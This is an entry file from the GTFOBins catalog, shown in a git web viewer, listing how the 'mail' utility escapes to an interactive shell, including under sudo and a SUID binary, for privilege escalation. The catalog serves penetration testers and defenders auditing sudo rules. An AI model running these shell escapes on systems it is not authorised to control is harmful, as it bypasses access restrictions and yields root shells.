GTFOBins.github.io/_gtfobins/mail.md

16 lines
256 B
Markdown
Raw Normal View History

2018-05-29 20:34:56 +02:00
---
functions:
execute-interactive:
- code: |
mail -f /etc/hosts
!/bin/sh
sudo-enabled:
- code: |
sudo mail -f /etc/hosts
!/bin/sh
suid-limited:
- code: |-
./mail -f /etc/hosts
!/bin/sh
---